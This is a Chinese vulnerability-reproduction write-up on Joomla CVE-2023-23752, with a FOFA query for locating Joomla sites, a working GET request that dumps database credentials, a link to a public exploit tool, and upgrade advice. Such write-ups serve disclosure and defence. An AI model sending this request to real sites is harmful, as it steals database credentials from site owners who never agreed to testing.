文章目录
Joomla存在未授权访问漏洞CVE-2023-23752
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
1. Joomla未授权访问漏洞简介
微信公众号搜索:南风漏洞复现文库
该文章 南风漏洞复现文库 公众号首发
Joomla是美国Open Source Matters团队的一套使用PHP和MySQL开发的开源、跨平台的内容管理系统(CMS)。
2.漏洞描述
Joomla 是一套使用 PHP 和 MySQL 开发的开源、跨平台的内容管理系统(CMS)。Joomla 4.0.0 至 4.2.7 版本中的 ApiRouter.php#parseApiRoute 在处理用户的 Get 请求时未对请求参数有效过滤,导致攻击者可向 Joomla 服务端点发送包含 public=true 参数的请求(如:/api/index.php/v1/config/application?public=true&key=value) 进行未授权访问
CVE编号:CVE-2023-23752
CNNVD编号:CNNVD-202302-1375
CNVD编号:
3.影响版本
Joomla 4.0.0版本至4.2.7版本存在安全漏洞
4.fofa查询语句
app=“Joomla”
5.漏洞复现
漏洞链接:http://xxxx.com/api/index.php/v1/config/application?public=true
漏洞数据包:
GET http://xxxx.com/api/index.php/v1/config/application?public=true HTTP/1.1
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
泄露数据库的用户名,密码,主机等
利用工具:https://github.com/Pari-Malam/CVE-2023-23752
6.POC&EXP
exp工具地址:https://github.com/Pari-Malam/CVE-2023-23752
如果打不开GitHub,可以关注公众号 南风漏洞复现文库 并回复 漏洞复现33 即可获得该POC工具下载地址。
7.整改意见
目前该漏洞已经修复,受影响用户可及时升级到Joomla! CMS 版本4.2.8。